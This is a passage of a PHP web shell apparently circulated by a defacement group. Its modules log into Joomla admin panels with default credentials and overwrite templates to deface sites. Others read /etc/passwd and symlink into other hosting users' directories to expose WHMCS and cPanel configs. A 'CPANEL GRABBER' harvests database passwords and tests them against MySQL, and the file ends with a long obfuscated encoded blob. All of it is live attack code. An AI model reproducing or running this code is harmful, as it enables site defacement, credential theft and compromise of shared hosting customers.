  5736. if($pos === false) {
  5737. echo "<center><table border=1 cellspacing=1 cellpading=1>
  5738. <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=red> Failed </font></td></tr></table></center>";
  5739. }
  5740. else {
  5741. $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
  5742. $filename = 'deftemp.txt';
  5743. $fp = fopen($filename, "a+");
  5744. $write = fputs($fp, $deftempurl."\n");
  5745. fclose($fp);
  5746.  
  5747. echo "<center><table border=1 cellspacing=1 cellpading=1>
  5748. <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=green> Defaced </font></td></tr></table></center>";
  5749.  
  5750.  
  5751. }
  5752.  
  5753. }
  5754.  
  5755. else
  5756. {
  5757.  
  5758. $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
  5759. $data = mysql_fetch_array($req);
  5760. $template_name=$data["template"];
  5761.  
  5762. $urlto=$site_urlto."/administrator/index.php";
  5763. $ch = curl_init();
  5764. curl_setopt($ch, CURLOPT_URL, $urlto);
  5765. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  5766. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  5767. curl_setopt($ch, CURLOPT_HEADER, 1);
  5768. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  5769. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  5770. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  5771. $buffer = curl_exec($ch);
  5772.  
  5773. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
  5774.  
  5775. $urlto=$site_urlto."/administrator/index.php";
  5776. $ch = curl_init();
  5777. curl_setopt($ch, CURLOPT_URL, $urlto);
  5778. curl_setopt($ch, CURLOPT_POST, 1);
  5779. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&".$hidden."=1");
  5780. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  5781. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  5782. curl_setopt($ch, CURLOPT_HEADER, 0);
  5783. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  5784. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  5785. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  5786. $buffer = curl_exec($ch);
  5787.  
  5788. $pos = strpos($buffer,"com_config");
  5789.  
  5790. if($pos === false) {
  5791.  
  5792. }
  5793. else {
  5794. }
  5795. $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
  5796. $ch = curl_init();
  5797. curl_setopt($ch, CURLOPT_URL, $urlto);
  5798. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  5799. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  5800. curl_setopt($ch, CURLOPT_HEADER, 0);
  5801. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  5802. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  5803. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  5804. $buffer = curl_exec($ch);
  5805.  
  5806. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
  5807.  
  5808. if($hidden2) {
  5809.  
  5810. }
  5811. else {
  5812.  
  5813. }
  5814.  
  5815.  
  5816. $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";
  5817. $ch = curl_init();
  5818. curl_setopt($ch, CURLOPT_URL, $urlto);
  5819. curl_setopt($ch, CURLOPT_POST, 1);
  5820. curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
  5821. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  5822. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  5823. curl_setopt($ch, CURLOPT_HEADER, 0);
  5824. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  5825. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  5826. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  5827. $buffer = curl_exec($ch);
  5828.  
  5829. $pos = strpos($buffer,'<dd class="message message fade">');
  5830. if($pos === false) {
  5831. echo "<center><table border=1 cellspacing=1 cellpading=1>
  5832. <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=red> Failed </font></td></tr></table></center>";
  5833. }
  5834. else {
  5835. $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
  5836. $filename = 'deftemp.txt';
  5837. $fp = fopen($filename, "a+");
  5838. $write = fputs($fp, $deftempurl."\n");
  5839. fclose($fp);
  5840.  
  5841. echo "<center><table border=1 cellspacing=1 cellpading=1>
  5842. <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=green> Defaced </font></td></tr></table></center>";
  5843.  
  5844.  
  5845. }
  5846.  
  5847. }
  5848.  
  5849.  
  5850. //upto this alright
  5851.  
  5852.  
  5853.  
  5854.  
  5855.  
  5856.  
  5857.  
  5858.  
  5859. }
  5860. else {
  5861. }
  5862. }
  5863. else {
  5864. }
  5865. }
  5866.  
  5867. $cntpasschanged=file('passchanged.txt');
  5868. $countpasschanged= count ($cntpasschanged);
  5869.  
  5870.  
  5871.  
  5872. echo("<br>");
  5873. $defacedurl=('<a href="deftemp.txt" target="_blank">View List of Defaced Site</a><br />');
  5874. $passchangedurl=('<a href="passchanged.txt" target="_blank">View List of Password Changed site</a><br />');
  5875. echo "<center><table border=1 cellspacing=1 cellpading=1>
  5876. <td width=300><font color=green> $defacedurl</font></td><td width=300><font color=green> $passchangedurl </font></td></tr></table></center>";
  5877.  
  5878.  
  5879.  
  5880. //declaring function entre2v2
  5881. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  5882. $ar0=explode($marqueurDebutLien, $text);
  5883. $ar1=explode($marqueurFinLien, $ar0[$i]);
  5884. return trim($ar1[0]);
  5885. }
  5886.  
  5887. function randomt() {
  5888.  
  5889. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  5890. srand((double)microtime()*1000000);
  5891. $i = 0;
  5892. $pass = '' ;
  5893.  
  5894. while ($i <= 7) {
  5895. $num = rand() % 33;
  5896. $tmp = substr($chars, $num, 1);
  5897. $pass = $pass . $tmp;
  5898. $i++;
  5899. }
  5900.  
  5901. return $pass;
  5902. }
  5903. ?>
  5904.  
  5905. <?php }
  5906. # x=reseller
  5907. elseif(isset($_GET['x']) && ($_GET['x'] == 'reseller')){ ?>
  5908. <form action="?dm=<?php echo $pwd; ?>&amp;x=reseller" method="post">
  5909.  
  5910.  
  5911. <?php
  5912. echo '<br><br><body bgcolor=black><center>
  5913. <img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"><br/><br/>
  5914. <nobr><b><span class="b7">O=:[ CPANEL</span> <span class="b8">GRABBER ]:=O</nobr></span><br/><br/>
  5915. <form method="POST">
  5916. <center>
  5917. <textarea style="color:red;background-color:#000000" cols="60" name="passwd" rows="20">';
  5918. $uSr=file("/etc/passwd");
  5919. foreach($uSr as $usrr)
  5920. {
  5921. $str=explode(":",$usrr);
  5922. echo $str[0]."\n";
  5923. }
  5924. ?>
  5925.  
  5926. </textarea><p>
  5927. <nobr><font style="color:red;background-color:#000000">
  5928. [~] Home :
  5929. <select style="color:red;background-color:#000000" title="Select Target Home" name="home" size="10">
  5930. <option title="home" value="home">home</option>
  5931. <option title="home2" value="home2">home2</option>
  5932. <option title="home3" value="home3">home3</option>
  5933. <option title="home4" value="home4">home4</option>
  5934. <option title="home5" value="home5">home5</option>
  5935. <option title="home6" value="home6">home6</option>
  5936. <option title="home7" value="home7">home7</option>
  5937. <option title="home8" value="home8">home8</option>
  5938. <option title="home9" value="home9">home9</option>
  5939. <option title="home10" value="home10">home10</option>
  5940. </select>&nbsp;&nbsp;&nbsp; [~] Htaccess :
  5941. <select style="color:red;background-color:#000000" title="Select Software" name="soft" size="10">
  5942. <option title="Apache" value="Options all
  5943. Options +Indexes
  5944. Options +FollowSymLinks
  5945. DirectoryIndex Sux.html
  5946. AddType text/plain .php
  5947. AddHandler server-parsed .php
  5948. AddType text/plain .html
  5949. AddHandler txt .html
  5950. Require None
  5951. Satisfy Any">Apache</option>
  5952. <option title="Litespeed" value="
  5953. Options +FollowSymLinks
  5954. DirectoryIndex seees.html
  5955. RemoveHandler .php
  5956. AddType application/octet-stream .php ">Litespeed</option>
  5957.  
  5958. </select> &nbsp;&nbsp; <input style="color:red;background-color:#000000" name="anu" size="10"
  5959. value="<< &nbsp;START SCAN&nbsp; >>" type="submit">
  5960. <br/><br/></form></center>
  5961.  
  5962. <?php
  5963. @ini_set('html_errors',0);
  5964. @ini_set('max_execution_time',0);
  5965. @ini_set('display_errors', 0);
  5966. @ini_set('file_uploads',1);
  5967. if ($_POST['anu']) {
  5968. $path = $_POST['path'];
  5969. $home = $_POST['home'];
  5970.  
  5971. $functions=@ini_get("disable_functions");
  5972. if(eregi("symlink",$functions))
  5973. {
  5974. die ('Kurang Ganteng Cok');
  5975. }
  5976. @mkdir(RESELLER, 0755);
  5977. @chdir(RESELLER);
  5978. $htaccess=$_POST['soft'];
  5979. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  5980.  
  5981. $passwd=explode("\n",$_POST["passwd"]); foreach($passwd as $pwd){
  5982. $user=trim($pwd);
  5983. @symlink('/'.$home.'/'.$user.'/public_html/moving.page/index.html',$user.' <~ RESELLER1');
  5984. @symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER2');
  5985. }
  5986.  
  5987. echo '<center>
  5988. <font face="Audiowide" size="5" style="color:red;background-color:#000000">
  5989. <img src="http://www.komunitas.for-indonesia.com/images/smiley/piss.gif"><br/>
  5990. Scanning Complete....<br/>
  5991. Now Checking Folder Result....<br/><br/><br/>
  5992. <a href="/RESELLER">O=[ GO TO HELL ]=O</a>
  5993. </font>
  5994. <br/><br/><br/></center> </body></html> ';
  5995. }
  5996. ?>
  5997.  
  5998. <?php }
  5999. # x=dmwhmcs11
  6000. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmwhmcs11')){ ?>
  6001. <form action="?dm=<?php echo $pwd; ?>&amp;x=dmwhmcs11" method="post">
  6002.  
  6003. <?php
  6004. echo '<br><br><body bgcolor=black><center>
  6005. <img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"><br/><br/>
  6006. <nobr><span class="b7">O=:[ SCAN CMS</span> <span class="b8">WHMCS ]:=O</nobr></span><br/><br/>
  6007. <form method="POST">
  6008. <center>
  6009. <textarea style="color:red;background-color:#000000" cols="60" name="passwd" rows="20">';
  6010. $uSr=file("/etc/passwd");
  6011. foreach($uSr as $usrr)
  6012. {
  6013. $str=explode(":",$usrr);
  6014. echo $str[0]."\n";
  6015. }
  6016. ?>
  6017.  
  6018. </textarea><p>
  6019. <nobr><font style="color:red;background-color:#000000">
  6020. [~] Home :
  6021. <select style="color:red;background-color:#000000" title="Select Target Home" name="home" size="10">
  6022. <option title="home" value="home">home</option>
  6023. <option title="home2" value="home2">home2</option>
  6024. <option title="home3" value="home3">home3</option>
  6025. <option title="home4" value="home4">home4</option>
  6026. <option title="home5" value="home5">home5</option>
  6027. <option title="home6" value="home6">home6</option>
  6028. <option title="home7" value="home7">home7</option>
  6029. <option title="home8" value="home8">home8</option>
  6030. <option title="home9" value="home9">home9</option>
  6031. <option title="home10" value="home10">home10</option>
  6032. </select>&nbsp;&nbsp;&nbsp; [~] Htaccess :
  6033. <select style="color:red;background-color:#000000" title="Select Software" name="soft" size="10">
  6034. <option title="Apache" value="Options all
  6035. Options +Indexes
  6036. Options +FollowSymLinks
  6037. DirectoryIndex Sux.html
  6038. AddType text/plain .php
  6039. AddHandler server-parsed .php
  6040. AddType text/plain .html
  6041. AddHandler txt .html
  6042. Require None
  6043. Satisfy Any">Apache</option>
  6044. <option title="Litespeed" value="
  6045. Options +FollowSymLinks
  6046. DirectoryIndex seees.html
  6047. RemoveHandler .php
  6048. AddType application/octet-stream .php ">Litespeed</option>
  6049.  
  6050. </select> &nbsp;&nbsp; <input style="color:red;background-color:#000000" name="anu" size="10"
  6051. value="<< &nbsp;START SCAN&nbsp; >>" type="submit">
  6052. <br/><br/></form></center>
  6053.  
  6054. <?php
  6055. @ini_set('html_errors',0);
  6056. @ini_set('max_execution_time',0);
  6057. @ini_set('display_errors', 0);
  6058. @ini_set('file_uploads',1);
  6059. if ($_POST['anu']) {
  6060. $path = $_POST['path'];
  6061. $home = $_POST['home'];
  6062.  
  6063. $functions=@ini_get("disable_functions");
  6064. if(eregi("symlink",$functions))
  6065. {
  6066. die ('Kurang Ganteng Cok');
  6067. }
  6068. @mkdir(WHMCS, 0755);
  6069. @chdir(WHMCS);
  6070.  
  6071.  
  6072.  
  6073. $htaccess=$_POST['soft'];
  6074. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  6075.  
  6076. $passwd=explode("\n",$_POST["passwd"]);
  6077. foreach($passwd as $pwd){
  6078. $user=trim($pwd);
  6079.  
  6080. @symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER');
  6081.  
  6082. @symlink('/'.$home.'/'.$user.'/public_html/modules/registrars/',$user.' <~ WHMCS-1'); @symlink('/'.$home.'/'.$user.'/public_html/account/modules/registrars/',$user.' <~ WHMCS-2');
  6083. @symlink('/'.$home.'/'.$user.'/public_html/accounts/modules/registrars/',$user.' <~ WHMCS-3');
  6084. @symlink('/'.$home.'/'.$user.'/public_html/central/modules/registrars/',$user.' <~ WHMCS-4');
  6085. @symlink('/'.$home.'/'.$user.'/public_html/clienti/modules/registrars/',$user.' <~ WHMCS-5');
  6086. @symlink('/'.$home.'/'.$user.'/public_html/client/modules/registrars/',$user.' <~ WHMCS-6');
  6087. @symlink('/'.$home.'/'.$user.'/public_html/cliente/modules/registrars/',$user.' <~ WHMCS-7');
  6088. @symlink('/'.$home.'/'.$user.'/public_html/clientes/modules/registrars/',$user.' <~ WHMCS-8');
  6089. @symlink('/'.$home.'/'.$user.'/public_html/clients/modules/registrars/',$user.' <~ WHMCS-9');
  6090. @symlink('/'.$home.'/'.$user.'/public_html/clientarea/modules/registrars/',$user.' <~ WHMCS-9');
  6091. @symlink('/'.$home.'/'.$user.'/public_html/clientsarea/modules/registrars/',$user.' <~ WHMCS-10');
  6092. @symlink('/'.$home.'/'.$user.'/public_html/client-area/modules/registrars/',$user.' <~ WHMCS-11');
  6093. @symlink('/'.$home.'/'.$user.'/public_html/clients-area/modules/registrars/',$user.' <~ WHMCS-12');
  6094. @symlink('/'.$home.'/'.$user.'/public_html/clientzone/modules/registrars/',$user.' <~ WHMCS-13');
  6095. @symlink('/'.$home.'/'.$user.'/public_html/client-zone/modules/registrars/',$user.' <~ WHMCS-14');
  6096. @symlink('/'.$home.'/'.$user.'/public_html/core/modules/registrars/',$user.' <~ WHMCS-15');
  6097. @symlink('/'.$home.'/'.$user.'/public_html/company/modules/registrars/',$user.' <~ WHMCS-16');
  6098. @symlink('/'.$home.'/'.$user.'/public_html/customer/modules/registrars/',$user.' <~ WHMCS-17');
  6099. @symlink('/'.$home.'/'.$user.'/public_html/customers/modules/registrars/',$user.' <~ WHMCS-18');
  6100. @symlink('/'.$home.'/'.$user.'/public_html/bill/modules/registrars/',$user.' <~ WHMCS-19');
  6101. @symlink('/'.$home.'/'.$user.'/public_html/billing/modules/registrars/',$user.' <~ WHMCS-20');
  6102. @symlink('/'.$home.'/'.$user.'/public_html/finance/modules/registrars/',$user.' <~ WHMCS-21');
  6103. @symlink('/'.$home.'/'.$user.'/public_html/financeiro/modules/registrars/',$user.' <~ WHMCS-22');
  6104. @symlink('/'.$home.'/'.$user.'/public_html/host/modules/registrars/',$user.' <~ WHMCS-23');
  6105. @symlink('/'.$home.'/'.$user.'/public_html/hosts/modules/registrars/',$user.' <~ WHMCS-24');
  6106. @symlink('/'.$home.'/'.$user.'/public_html/hosting/modules/registrars/',$user.' <~ WHMCS-25');
  6107. @symlink('/'.$home.'/'.$user.'/public_html/hostings/modules/registrars/',$user.' <~ WHMCS'-26);
  6108. @symlink('/'.$home.'/'.$user.'/public_html/klien/modules/registrars/',$user.' <~ WHMCS-27');
  6109. @symlink('/'.$home.'/'.$user.'/public_html/manage/modules/registrars/',$user.' <~ WHMCS-28');
  6110. @symlink('/'.$home.'/'.$user.'/public_html/manager/modules/registrars/',$user.' <~ WHMCS-29');
  6111. @symlink('/'.$home.'/'.$user.'/public_html/member/modules/registrars/',$user.' <~ WHMCS-30');
  6112. @symlink('/'.$home.'/'.$user.'/public_html/members/modules/registrars/',$user.' <~ WHMCS-31');
  6113. @symlink('/'.$home.'/'.$user.'/public_html/my/modules/registrars/',$user.' <~ WHMCS-32');
  6114. @symlink('/'.$home.'/'.$user.'/public_html/myaccount/modules/registrars/',$user.' <~ WHMCS-33');
  6115. @symlink('/'.$home.'/'.$user.'/public_html/my-account/client/modules/registrars/',$user.' <~ WHMCS-34');
  6116. @symlink('/'.$home.'/'.$user.'/public_html/myaccounts/modules/registrars/',$user.' <~ WHMCS-35');
  6117. @symlink('/'.$home.'/'.$user.'/public_html/my-accounts/modules/registrars/',$user.' <~ WHMCS-36');
  6118. @symlink('/'.$home.'/'.$user.'/public_html/order/modules/registrars/',$user.' <~ WHMCS-37');
  6119. @symlink('/'.$home.'/'.$user.'/public_html/orders/modules/registrars/',$user.' <~ WHMCS-38');
  6120. @symlink('/'.$home.'/'.$user.'/public_html/painel/modules/registrars/',$user.' <~ WHMCS-39');
  6121. @symlink('/'.$home.'/'.$user.'/public_html/panel/modules/registrars/',$user.' <~ WHMCS-40');
  6122. @symlink('/'.$home.'/'.$user.'/public_html/panels/modules/registrars/',$user.' <~ WHMCS-41');
  6123. @symlink('/'.$home.'/'.$user.'/public_html/portal/modules/registrars/',$user.' <~ WHMCS-42');
  6124. @symlink('/'.$home.'/'.$user.'/public_html/portals/modules/registrars/',$user.' <~ WHMCS-43');
  6125. @symlink('/'.$home.'/'.$user.'/public_html/secure/modules/registrars/',$user.' <~ WHMCS-44');
  6126. @symlink('/'.$home.'/'.$user.'/public_html/support/modules/registrars/',$user.' <~ WHMCS-45');
  6127. @symlink('/'.$home.'/'.$user.'/public_html/supporte/modules/registrars/',$user.' <~ WHMCS-46');
  6128. @symlink('/'.$home.'/'.$user.'/public_html/supports/modules/registrars/',$user.' <~ WHMCS-47');
  6129. @symlink('/'.$home.'/'.$user.'/public_html/web/modules/registrars/',$user.' <~ WHMCS-48');
  6130. @symlink('/'.$home.'/'.$user.'/public_html/webhost/modules/registrars/',$user.' <~ WHMCS-49');
  6131. @symlink('/'.$home.'/'.$user.'/public_html/webhosting/modules/registrars/',$user.' <~ WHMCS-50');
  6132. @symlink('/'.$home.'/'.$user.'/public_html/whm/modules/registrars/',$user.' <~ WHMCS-51');
  6133. @symlink('/'.$home.'/'.$user.'/public_html/whmcs/modules/registrars/',$user.' <~ WHMCS-52');
  6134. @symlink('/'.$home.'/'.$user.'/public_html/whmcs2/modules/registrars/',$user.' <~ WHMCS-53');
  6135. @symlink('/'.$home.'/'.$user.'/public_html/Whm/modules/registrars/',$user.' <~ WHMCS-54');
  6136. @symlink('/'.$home.'/'.$user.'/public_html/Whmcs/modules/registrars/',$user.' <~ WHMCS-55');
  6137. @symlink('/'.$home.'/'.$user.'/public_html/WHM/modules/registrars/',$user.' <~ WHMCS-56');
  6138. @symlink('/'.$home.'/'.$user.'/public_html/WHMCS/modules/registrars/',$user.' <~ WHMCS-57');
  6139. }
  6140. echo '<hr color="#00bfff"><center>
  6141. <font face="Audiowide" size="5" style="color:#00bfff;background-color:#000000">
  6142. <img src="http://www.komunitas.for-indonesia.com/images/smiley/piss.gif"><br/>
  6143. Scanning Complete....<br/>
  6144. Now Checking Folder Result....<br/><br/><br/>
  6145. <a href="/WHMCS">O=[ GO TO HELL ]=O</a>
  6146. </font>
  6147. <br/><br/><br/></center> </body></html> ';
  6148. }
  6149. ?>
  6150.  
  6151. <?php }
  6152. # x=cp3
  6153. elseif(isset($_GET['x']) && ($_GET['x'] == 'cp3')){
  6154. ?>
  6155. <form action="?dm=<?php echo $pwd; ?>&amp;x=cp3" method="post">
  6156.  
  6157. <?php
  6158. set_time_limit(0);
  6159. error_reporting(0);
  6160. if(isset($_POST['url'])){
  6161. $url = $_POST['url'];
  6162. }else{
  6163. $url = 'http://';
  6164. }
  6165. echo '<center><br/><br/><nobr><span class="b7">O=:[ CPANEL</span> <span class="b8">GRABBER ]:=O</nobr><br/><br/>
  6166. <form method="POST">
  6167. <input name="url" style="color:#FF0000;background-color:#000000" type="text" value="'.$url.'" size="40"/><br/>
  6168. <p><input type="submit" style="color:#FF0000;background-color:#000000" value="--:[ CROTZ ]:--"/>
  6169. </form><br/><br/>';
  6170. if(isset($_POST['url'])){
  6171. if(!file_get_contents($url)){
  6172. echo '--:[ ERROR BRAY ]:--';
  6173. }else{
  6174. $a = 0;
  6175. foreach(get_data($url) as $info){
  6176. if(login($info[0],$info[1])){
  6177. echo "<b style=' color: #808080 ; text-shadow:0px 0px 1px #808080 ;'>-:[ USERNAME & PASSWORD ]:-</b> <b style=' color: #0000FF ; text-shadow:0px 0px 1px #0000FF ;'>[$info[0]]</b> <b style=' color: #CC0000; text-shadow:0px 0px 1px #CC0000;'>[$info[1]]</b><br />";
  6178. $a++;
  6179. }
  6180. }
  6181. echo "<b style=' color: #808080 ; text-shadow:0px 0px 1px #808080 ;'><hr> *SUKSES ^_^ || $a CPANEL FOUNDED*<br />";
  6182. }
  6183. }
  6184. echo '<br/><div align="center"><font color="blue" face="Verdana" size="3">--=|[+] Sh4d0w4rT [+]|=--</font></div>
  6185. </body>
  6186. </html>';
  6187. function ex($a,$b,$text){
  6188. $explode = explode($a,$text);
  6189. $explode = explode($b,$explode[1]);
  6190. return $explode[0];
  6191. }
  6192. function login($user,$pass){
  6193. $c = @mysql_connect('localhost',$user,$pass);
  6194. if($c){
  6195. mysql_close($c);
  6196. return true;
  6197. }else{
  6198. return false;
  6199. }
  6200. }
  6201. function get_data($url){
  6202. $ar = array('1.txt','2.txt','3.txt','4.txt','5.txt','6.txt','7.txt','8.txt','9.txt','10.txt','11.txt','12.txt','13.txt','14txt','15.txt','16.txt','17.txt','18.txt','19.txt','20.txt','21.txt','22.txt','23.txt','24.txt','25.txt','26.txt','27.txt','28.txt','29.txt','30.txt','31.txt','32.txt','33.txt','34.txt','35.txt','36.txt','37.txt','38.txt','39.txt','40.txt','41.txt','42.txt','43.txt','44.txt','45.txt','46.txt','47.txt','48.txt','49.txt','50.txt');
  6203. $src = file_get_contents($url);
  6204. $files = explode('<a href="',$src);
  6205. $data = array();
  6206. foreach($files as $id=>$file){
  6207. if($id == 0){
  6208. continue;
  6209. }
  6210. $file = explode('">',$file);
  6211. $file = trim($file[0]);
  6212. if(!eregi('.txt',$file)){
  6213. continue;
  6214. }
  6215. $src = file_get_contents("$url/$file");
  6216. if(!$src){
  6217. continue;
  6218. }
  6219. $user = str_replace($ar,'',$file);
  6220. $user = str_replace($ar,'',$user.'.txt');
  6221. $user = str_replace($ar,'',$user.'.txt');
  6222. $user = trim(str_replace('.txt','',$user));
  6223. if(eregi("WordPress",$src)){
  6224. $pass = ex("define('DB_PASSWORD', '","');",$src);
  6225. $data[] = array($user,$pass);
  6226. }else{
  6227. $tokens = token_get_all($src);
  6228. foreach($tokens as $token){
  6229. if(!$token[1]){
  6230. continue;
  6231. }
  6232. $tokenname = token_name($token[0]);
  6233. if($tokenname != 'T_VARIABLE'){
  6234. continue;
  6235. }
  6236. $var = $token[1];
  6237. if(eregi('pass',$var)){
  6238. $f = str_replace(' ','',ex($var,';',$src));
  6239. $a = trim(ex("='","'",$f));
  6240. $b = trim(ex('"','"',$f));
  6241. if($a != ''){
  6242. $pass = $a;
  6243. }elseif($b != ''){
  6244. $pass = $b;
  6245. }
  6246. if($pass == ''){
  6247. continue;
  6248. }
  6249. $data[] = array($user,$pass);
  6250. }
  6251. }
  6252. }
  6253. }
  6254. return $data;
  6255. }
  6256. ;
  6257. return;
  6258. ?>~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